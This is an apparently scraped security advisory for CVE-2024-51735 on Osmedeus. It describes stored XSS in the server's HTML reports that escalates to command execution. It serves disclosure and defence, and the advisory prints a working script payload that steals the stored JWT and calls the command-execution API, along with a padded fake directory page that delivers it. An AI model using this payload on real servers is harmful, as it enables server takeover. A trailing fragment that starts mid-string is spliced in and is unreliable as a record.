ghsa-wvv7-wm5v-w2gv
Vulnerability from github
Published
2024-11-05 15:18
Modified
2024-11-06 19:55
Summary
Osmedeus Web Server Vulnerable to Stored XSS, Leading to RCE
Details

Summary

XSS occurs on the Osmedeus web server when viewing results from the workflow, allowing commands to be executed on the server.

Details

When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the general-template.md template.

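```
<p align="center">
  <a href="https://www.osmedeus.org"><img alt="Osmedeus" src="https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png" height="140" /></a>
  <br />
  <br />
  <strong>Execute Summary Generated by Osmedeus {{Version}} at <em>{{CurrentDay}}</em></strong>

  <p align="center">
  <a href="https://docs.osmedeus.org/"><img src="https://img.shields.io/badge/Documentation-0078D4?style=for-the-badge&logo=GitBook&logoColor=39ff14&labelColor=black&color=black"></a>
  <a href="https://docs.osmedeus.org/donation/"><img src="https://img.shields.io/badge/Donation-0078D4?style=for-the-badge&logo=GitHub-Sponsors&logoColor=39ff14&labelColor=black&color=black"></a>
  <a href="https://twitter.com/OsmedeusEngine"><img src="https://img.shields.io/badge/%40OsmedeusEngine-0078D4?style=for-the-badge&logo=Twitter&logoColor=39ff14&labelColor=black&color=black"></a>
  </p>
</p>

## Scan Information

<scanInfo />

***

## 🚀 Subdomains

<content src="{{Output}}/subdomain/final-{{Workspace}}.txt" shorten=true />

***

## 🌐 HTTP Fingerprint

<content src="{{Output}}/fingerprint/beautify-{{Workspace}}-http.txt" />

***

## 🐞 Vulnerability

### List of Vulnerability Reports

- [**{{Workspace}}-report.html**]({{Output}}/vuln/active/{{Workspace}}-report.html)
- [**{{Workspace}}-sensitive.html**]({{Output}}/vuln/sensitive/{{Workspace}}-sensitive.html)
- [**{{Workspace}}-nuclei.html**]({{Output}}/vuln/nuclei/{{Workspace}}-nuclei.html)

### Jaeles Scan

<content src="{{Output}}/vuln/active/jaeles-summary.txt" />

<content src="{{Output}}/vuln/sensitive/jaeles-summary.txt" />

***

### Nuclei Scan

<content src="{{Output}}/vuln/nuclei/{{Workspace}}-nuclei-scan.txt" />

***

## 🕷️ Spider Content

<content src="{{Output}}/linkfinding/links-{{Workspace}}.txt"/>

***

## 📃 Content Discovery

<content src="{{Output}}/directory/unique-beautify-{{Workspace}}.txt" />

***

## 🔍 Port Scan

<content src="{{Output}}/portscan/open-ports.txt" />

***
```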

The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. The issue starts with processing the <content> tags, and XSS occurs when the extendTag function is called.

https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124

Execution enters this if branch when one of the following cases is met:

  • Tag shorten=true: In the default template, only subdomains have this tag ⇒ Subdomains cannot contain special characters, so XSS is not possible.
  • len(fileContent) > r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).

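After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:

  • It can contain special characters since the spider retrieves results through Katana ⇒ Katana parses content based on <a> tags ⇒ We can create custom payloads by leveraging this mechanism.

```
<!-- Fake Index Content -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="?abc=<script>alert(1)</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
```

  • Easily bypass the condition len(fileContent) > r.Opt.MDCodeBlockLimit
  • Spider is a module within the general workflow ⇒ a default workflow that is most commonly used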
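
The branch condition and the missing output encoding described above, shown side by side as an added Go example (not Osmedeus code). `renderReportBlock`, `wrapRaw` and `wrapEscaped` are hypothetical names, the `<details>` wrapper is an assumed output shape, and the link list is constructed; only the 10,000 limit and the `shorten` flag come from the advisory.

```go
package main

import (
	"fmt"
	"html"
	"strings"
)

// Default MDCodeBlockLimit value quoted in the advisory.
const mdCodeBlockLimit = 10000

// needsExtend mirrors the branch condition from the advisory: the tag carries
// shorten=true, or the file is longer than the code-block limit.
func needsExtend(fileContent string, shorten bool) bool {
	return shorten || len(fileContent) > mdCodeBlockLimit
}

// wrapRaw is the vulnerable pattern: scanner output is concatenated into HTML
// as-is, so any markup inside it becomes part of the report page.
// The <details> wrapper is an assumption, not the project's actual markup.
func wrapRaw(title, fileContent string) string {
	return "<details><summary>" + title + "</summary><pre>" + fileContent + "</pre></details>"
}

// wrapEscaped is the hardened form: every untrusted string is HTML-encoded
// at the point where it enters an HTML context.
func wrapEscaped(title, fileContent string) string {
	return "<details><summary>" + html.EscapeString(title) + "</summary><pre>" +
		html.EscapeString(fileContent) + "</pre></details>"
}

// renderReportBlock (hypothetical) chooses between a Markdown code fence and
// the HTML wrapper, the way the advisory describes the report generator doing.
func renderReportBlock(title, fileContent string, shorten bool, wrap func(string, string) string) string {
	if needsExtend(fileContent, shorten) {
		return wrap(title, fileContent)
	}
	fence := strings.Repeat("`", 3)
	return fence + "\n" + fileContent + fence
}

// sampleSpiderOutput builds a constructed links file: one URL carrying the
// advisory's alert(1) marker, padded with harmless URLs past the limit.
func sampleSpiderOutput() string {
	var b strings.Builder
	b.WriteString("http://target.example/?abc=<script>alert(1)</script>\n")
	for i := 1; b.Len() <= mdCodeBlockLimit; i++ {
		fmt.Fprintf(&b, "http://target.example/test%d.php\n", i)
	}
	return b.String()
}

// hasRawScriptTag reports whether the rendered block still contains an
// unencoded script tag, i.e. whether a browser would parse it as markup.
func hasRawScriptTag(out string) bool {
	return strings.Contains(strings.ToLower(out), "<script")
}

func main() {
	links := sampleSpiderOutput()
	cases := []struct {
		name string
		wrap func(string, string) string
	}{
		{"raw", wrapRaw},
		{"escaped", wrapEscaped},
	}
	for _, c := range cases {
		out := renderReportBlock("Spider Content", links, false, c.wrap)
		fmt.Printf("%-8s len(input)=%d raw <script> in report: %v\n",
			c.name, len(links), hasRawScriptTag(out))
	}
}
```

Encoding belongs at the point where the string is written into HTML, so it holds regardless of which scanner module produced the file or how long the file is.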

PoC

https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing

Payload RCE

<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>

File index payload

```
Directory listing for /

Directory listing for /
```

Impact

Execute command on server



{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/j3ssie/osmedeus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.6.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-51735"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-05T15:18:05Z",
    "nvd_published_at": "2024-11-05T19:15:07Z",
    "severity": "CRITICAL"
  }
}
href=\"test201.php\"\u003etest201.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test202.php\"\u003etest202.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test203.php\"\u003etest203.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test204.php\"\u003etest204.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test205.php\"\u003etest205.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test206.php\"\u003etest206.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test207.php\"\u003etest207.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test208.php\"\u003etest208.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test209.php\"\u003etest209.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test210.php\"\u003etest210.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test211.php\"\u003etest211.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test212.php\"\u003etest212.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test213.php\"\u003etest213.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test214.php\"\u003etest214.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test215.php\"\u003etest215.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test216.php\"\u003etest216.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test217.php\"\u003etest217.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test218.php\"\u003etest218.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test219.php\"\u003etest219.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test220.php\"\u003etest220.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test221.php\"\u003etest221.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test222.php\"\u003etest222.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 
href=\"test223.php\"\u003etest223.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test224.php\"\u003etest224.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test225.php\"\u003etest225.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test226.php\"\u003etest226.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test227.php\"\u003etest227.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test228.php\"\u003etest228.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test229.php\"\u003etest229.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test230.php\"\u003etest230.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test231.php\"\u003etest231.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test232.php\"\u003etest232.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test233.php\"\u003etest233.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test234.php\"\u003etest234.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test235.php\"\u003etest235.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test236.php\"\u003etest236.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test237.php\"\u003etest237.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test238.php\"\u003etest238.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test239.php\"\u003etest239.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test240.php\"\u003etest240.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test241.php\"\u003etest241.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test242.php\"\u003etest242.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test243.php\"\u003etest243.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test244.php\"\u003etest244.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 
href=\"test245.php\"\u003etest245.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test246.php\"\u003etest246.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test247.php\"\u003etest247.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test248.php\"\u003etest248.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test249.php\"\u003etest249.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test250.php\"\u003etest250.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test251.php\"\u003etest251.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test252.php\"\u003etest252.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test253.php\"\u003etest253.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test254.php\"\u003etest254.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test255.php\"\u003etest255.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test256.php\"\u003etest256.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test257.php\"\u003etest257.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test258.php\"\u003etest258.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test259.php\"\u003etest259.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test260.php\"\u003etest260.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test261.php\"\u003etest261.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test262.php\"\u003etest262.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test263.php\"\u003etest263.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test264.php\"\u003etest264.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test265.php\"\u003etest265.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test266.php\"\u003etest266.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 
href=\"test267.php\"\u003etest267.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test268.php\"\u003etest268.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test269.php\"\u003etest269.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test270.php\"\u003etest270.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test271.php\"\u003etest271.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test272.php\"\u003etest272.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test273.php\"\u003etest273.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test274.php\"\u003etest274.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test275.php\"\u003etest275.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test276.php\"\u003etest276.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test277.php\"\u003etest277.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test278.php\"\u003etest278.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test279.php\"\u003etest279.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test280.php\"\u003etest280.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test281.php\"\u003etest281.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test282.php\"\u003etest282.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test283.php\"\u003etest283.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test284.php\"\u003etest284.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test285.php\"\u003etest285.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test286.php\"\u003etest286.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test287.php\"\u003etest287.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test288.php\"\u003etest288.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 
href=\"test289.php\"\u003etest289.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test290.php\"\u003etest290.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test291.php\"\u003etest291.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test292.php\"\u003etest292.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test293.php\"\u003etest293.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test294.php\"\u003etest294.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test295.php\"\u003etest295.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test296.php\"\u003etest296.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test297.php\"\u003etest297.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test298.php\"\u003etest298.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test299.php\"\u003etest299.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test300.php\"\u003etest300.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf\"\u003eThe.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ThuHo.rar\"\u003eThuHo.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vue.js%20Master%20Class%202024%20Edition.rar\"\u003eVue.js Master Class 2024 Edition.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar\"\u003eVueSchool - The Vue.js 3 Masterclass (2024-4).rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 
href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"win%20server%202016%281%29.ovf\"\u003ewin server 2016(1).ovf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"win%20server%202016.ovf\"\u003ewin server 2016.ovf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"?abc=\u003cscript\u003efetch(window.location.origin+\u0027/api/osmp/execute\u0027,{method:\u0027POST\u0027,body:JSON.stringify({command:\u0027echo 1 \u003e/tmp/js.txt\u0027,password:\u0027\u0027}),headers:{Authorization:\u0027Osmedeus \u0027+localStorage.jwt,\u0027Content-Type\u0027:\u0027application/json\u0027}});\u003c/script\u003e\"\u003eyxfzssjq_1721182234998.pdf\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\n```\n\n### Impact\nExecute command on server\n",
  "id": "GHSA-wvv7-wm5v-w2gv",
  "modified": "2024-11-06T19:55:13Z",
  "published": "2024-11-05T15:18:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51735"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/j3ssie/osmedeus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Osmedeus Web Server Vulnerable to Stored XSS, Leading to RCE"
}

